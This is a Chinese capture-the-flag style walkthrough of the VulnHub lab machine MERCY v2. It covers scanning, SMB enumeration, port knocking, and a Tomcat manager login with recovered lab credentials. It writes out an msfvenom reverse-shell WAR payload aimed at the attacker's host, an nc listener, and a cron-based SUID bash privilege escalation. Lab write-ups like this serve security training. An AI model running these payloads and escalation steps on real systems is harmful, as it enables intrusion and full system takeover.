digitalworld.local: MERCY v2靶机渗透攻略
vulnhub靶场之digitalworld.local: MERCY v2_mercy vulnhub-CSDN博客攻略https://download.vulnhub.com/digitalworld/MERCY-v2.zip靶场下载1.主机探测nmap -sn 192.168.100.0/24 arp-scan -I eth0 192.168.100.0/24 netdiscover -i eth0 -r 192.168.100.0/24 masscan 192.168.100.0/24 -p 8080探测到目标主机为192.168.100.1372.端口扫描我们可以看到好多的端口但是22端口和80端口没有开放22 53 80 110 139 143 445 993 995 80803.渗透测试访问web服务无法运作访问8080端口可以有效我们可以看到是一个默认的tomcat页面我们进行扫描扫描8080web服务目录dirb http://192.168.100.137:8080我们扫描到一个登录页面一个robots.txt访问robots.txt和manager我们进行访问是应该是base64解码后看内容是什么发现了密码password我们访问/manager/发现是一个登录页面但是我们不知道用户名和密码所以这里我们的思路就断了先把password放一放我们在扫描端口的时候扫描到了smb服务我们使用enum4linux对目标smb服务进行枚举smb服务enum4linux -a 192.168.100.137enum4linux是一个用于枚举 Windows 和 Samba 系统上信息的工具它可以帮助你发现目标系统的用户列表、组列表、共享信息以及其他一些有用的信息。这个工具特别适用于渗透测试和安全评估。重点突破qiusmbclient -NL 192.168.100.137 -N空密码匿名登录 -L列出目标 Samba 全部共享文件夹 输出证明靶机 3 个共享 列出共享文件夹根据前面2个命令我们可以看到用户名是qiu我们前面找到密码是password,用户名是qiu,我们使用smbclient查看目标文件共享smbclient -U qiu \\\\192.168.100.137\\qiu我们可以看到2个文件我们进行查看knock敲门服务在smb中输入 get config /tmp/config.txt因为在smb这个地方cat用不了kali中看到 80 22确实是被禁止使用了能看就行我们可以看到是一个敲门端口我们前面找到22端口和80端口没有开启这里我们使用knock命令开启22和80端口knock 192.168.100.137 159 27391 4 -v knock 192.168.100.137 17301 28504 9999 -v apt install knockd再次扫描发现80端口22端口都打开了访问80端口靶机敲门放行 80 后iptables 防火墙规则只信任本机内网网段192.168.100.x好像没有什么用我们进行扫描扫描80端口服务目录我们扫描到robots.txt,我们进行查看拼接发现是是ripscms,我们进行漏洞利用文件包含漏洞searchsploit rips 0.53前面8080端口提示我们看到用户名和密码我们前面扫描出来一个登录页面我们进行登录tomcat登录我们可以看到登录成功user usernamethisisasuperduperlonguser passwordheartbreakisinevitable rolesadmin-gui,manager-gui/文件上传拿shell我们在下面可以看到一个文件上传页面而且规定文件类型是war那么我们就使用msf进行msfvenom -p linux/x86/shell_reverse_tcp LHOST192.168.100.128 LPORT6666 -f war -o evil.war生成木马 ip是kali的 生成到了桌面 我直接xshell ftp中传到宿主机上 直接部署kali中监听nc -lvp 6666访问http://192.168.100.137:8080/evil/wttiifffzhfbs.jsp拿到shell权限提升使用python切换交互式shellpython -c import pty;pty.spawn(/bin/bash)这些都没有什么用前面文件包含我们可以看到2个用户名和密码我们试试第二个用户名和密码我们成功登录我们在home目录下看到一个定时任务权限是777那么我们就可以使用它进行提权我们修改内容cp /bin/bash /tmp/bash复制系统自带 bash 解释器到 /tmp 目录生成一份副本chmod 4777 /tmp/bash给这个 bash 副本设置SUID 特殊权限位这是典型 Cron 定时任务脚本权限不当提权管理员把 root 定时执行的脚本放开了普通用户写权限导致恶意代码注入利用 SUID 机制永久拿到 root 交互式 shell。

相关新闻

Java岗笔试示例题

Java岗笔试示例题

Java核心与并发编程选择题 关于 Java 中的 String 类,以下说法正确的是?​ A. String 是可变对象,修改字符串内容不会创建新对象B. String s “abc” 和 String s new String(“abc”) 在内存中创建的对象数量相同C. String 类被 final 修…

2026/7/2 17:56:40阅读更多 →
终极指南:5分钟快速部署Home Assistant智能家居操作系统

终极指南:5分钟快速部署Home Assistant智能家居操作系统

终极指南:5分钟快速部署Home Assistant智能家居操作系统 【免费下载链接】operating-system :beginner: Home Assistant Operating System 项目地址: https://gitcode.com/gh_mirrors/op/operating-system Home Assistant Operating System(原Has…

2026/7/2 17:56:40阅读更多 →
宠物家庭选添可、追觅还是石头?真实养宠用户的购买反馈

宠物家庭选添可、追觅还是石头?真实养宠用户的购买反馈

老周在深圳开了一家猫舍,店里常年养着十几只不同品种的猫。猫舍的地面每天被猫毛、猫砂和偶尔的猫吐毛球覆盖。老周之前用过两台不同品牌的洗地机,一台用了三个月后滚刷缠满猫毛拆都拆不下来,另一台用了一个月就发出难以忍受的发酵味。后来他…

2026/7/2 17:56:40阅读更多 →
基于超混沌与DNA编码的彩色图像加密:原理、Matlab实现与优化

基于超混沌与DNA编码的彩色图像加密:原理、Matlab实现与优化

1. 项目概述:当图像安全遇上混沌与DNA在数字信息爆炸的今天,一张普通的彩色图片,无论是个人照片、设计图纸还是医疗影像,其背后都可能承载着巨大的价值或隐私。如何确保这些图像在存储和传输过程中的安全,防止被未授权…

2026/7/2 23:13:08阅读更多 →
RSA加密实战:从手工计算到Python代码实现与性能优化

RSA加密实战:从手工计算到Python代码实现与性能优化

1. 项目概述:从理论到实战的RSA密码学之旅 每次看到“RSA”这个词,很多朋友的第一反应可能是“哦,那个非对称加密算法”,然后脑子里浮现出“公钥加密、私钥解密”、“大素数”、“欧拉函数”这些概念。但当你真正动手,…

2026/7/2 23:13:08阅读更多 →
多语言JVM项目安全检测实战:Find Security Bugs集成与漏洞修复指南

多语言JVM项目安全检测实战:Find Security Bugs集成与漏洞修复指南

1. 项目概述:为什么需要多语言安全检测?在今天的开发环境里,一个项目里混用多种JVM语言已经不是什么新鲜事了。你可能在一个微服务里用Java写核心业务逻辑,用Kotlin来构建更简洁的Android界面,用Groovy来写灵活的构建脚…

2026/7/2 23:13:08阅读更多 →
Java写的3DES文件加解密小工具:带图形界面、课设文档和完整截图

Java写的3DES文件加解密小工具:带图形界面、课设文档和完整截图

本文还有配套的精品资源,点击获取 简介:用Java写的3DES文本文件加解密程序,专门处理.txt文件,加密后生成二进制密文文件,支持用同一密钥还原原文。界面基于Swing开发,拆分为KeyPanel(密钥输入…

2026/7/2 23:13:08阅读更多 →
基于Rust构建高性能文件加密工具:从AES-256-GCM到命令行实现

基于Rust构建高性能文件加密工具:从AES-256-GCM到命令行实现

1. 项目概述:为什么选择 Rust 来造轮子?最近在整理一些个人资料和项目备份时,我遇到了一个不大不小的痛点:市面上能找到的文件加密工具,要么是功能臃肿的“全家桶”,要么是界面复杂、依赖一堆运行库的“大块…

2026/7/2 23:13:08阅读更多 →
JS逆向实战:从AES加密参数到Python复现的完整解析

JS逆向实战:从AES加密参数到Python复现的完整解析

1. 项目概述:从“黑盒”到“白盒”的逆向思维最近在技术社区和论坛里,关于“某鱼”平台数据抓取和自动化操作的讨论又热了起来。很多刚入行数据分析、爬虫开发,甚至是想做点市场调研的朋友,都卡在了第一步:登录和请求数…

2026/7/2 23:08:04阅读更多 →
AI Coding 六个月真实ROI账本:产品经理的血泪教训,研发的冷静忠告

AI Coding 六个月真实ROI账本:产品经理的血泪教训,研发的冷静忠告

6个月前的2025年12月,Boris Cherny 公开宣布自己卸载了 IDE。一时间,Vibe Coding 成了全行业最热的话题。6个月后,当我们回过头来拉一份真实账本,发现事情远没有"一句话生成一个App"那么浪漫。本文从产品经理和研发两个…

2026/7/2 12:10:34阅读更多 →
审计来了,数据权限全开——审计走了,怎么确保权限全部关掉?

审计来了,数据权限全开——审计走了,怎么确保权限全部关掉?

引言:审计结束三个月了,审计员的权限还没关某城商行每年按照监管要求开展至少一次数据安全审计。审计期间,内审部门需要抽样检查各类业务数据——交易流水、客户信息、员工操作日志、权限配置记录。这些数据分布在不同系统中,审计…

2026/7/2 12:10:34阅读更多 →
塞尔达传说旷野之息存档修改器:3分钟掌握海拉鲁世界自由定制技巧

塞尔达传说旷野之息存档修改器:3分钟掌握海拉鲁世界自由定制技巧

塞尔达传说旷野之息存档修改器:3分钟掌握海拉鲁世界自由定制技巧 【免费下载链接】BOTW-Save-Editor-GUI A Work in Progress Save Editor for BOTW 项目地址: https://gitcode.com/gh_mirrors/bo/BOTW-Save-Editor-GUI 想在《塞尔达传说:旷野之息…

2026/7/2 0:03:01阅读更多 →
告别 AccessKey:多云平台 CLI OAuth 免密认证完全指南

告别 AccessKey:多云平台 CLI OAuth 免密认证完全指南

在本地开发环境使用云厂商 CLI 时,传统的 AccessKey(AK)方式需要手动创建、下载和保管密钥,不仅繁琐,还存在泄漏风险。其实,主流云平台都已提供基于 OAuth 2.0 的免密认证方案,让开发者可以通过浏览器登录一次性完成授权,CLI 自动管理临时凭证的刷新,兼顾了便利与安全…

2026/7/2 0:03:01阅读更多 →
基于13DOF传感器与PIC32MZ的高精度嵌入式导航系统设计

基于13DOF传感器与PIC32MZ的高精度嵌入式导航系统设计

1. 项目背景与核心价值在嵌入式系统开发领域,高精度定位与导航一直是极具挑战性的技术方向。传统方案往往面临成本、精度和实时性难以兼顾的困境。这个项目通过13DOF(13自由度)传感器组合与PIC32MZ2048EFH100高性能MCU的协同工作,…

2026/7/2 0:03:01阅读更多 →
YOLOv8推理性能优化:从1.2FPS到35FPS的全链路加速实践

YOLOv8推理性能优化:从1.2FPS到35FPS的全链路加速实践

如果你在部署 YOLOv8 时,发现推理速度只有可怜的 1-2 FPS,而别人的演示视频却能跑到 30 FPS 以上,那么问题很可能不在模型本身,而在于你的整个处理链路。很多开发者拿到一个训练好的 YOLOv8 模型后,会直接使用官方示例…

2026/7/2 0:33:58阅读更多 →
Coze与Dify对比指南:低代码AI应用开发从入门到实战

Coze与Dify对比指南:低代码AI应用开发从入门到实战

1. 从零到一:为什么你需要了解 Coze 和 Dify?如果你对 AI 应用开发感兴趣,但一看到“大模型”、“智能体”、“工作流”这些词就头疼,觉得门槛太高,那这篇文章就是为你准备的。很多开发者,包括我自己&#…

2026/7/2 1:32:11阅读更多 →
AI生图工具怎么选?2026年6月版实测对比

AI生图工具怎么选?2026年6月版实测对比

做自媒体的朋友应该都有体会:配图一直是个让人头疼的问题。2026年,AI生图工具已经非常成熟了,但工具太多反而不知道怎么选。以下是截至2026年6月我对主流AI生图工具的实测对比。Midjourney V8.1:速度之王2026年6月11日&#xff0c…

2026/7/2 1:50:13阅读更多 →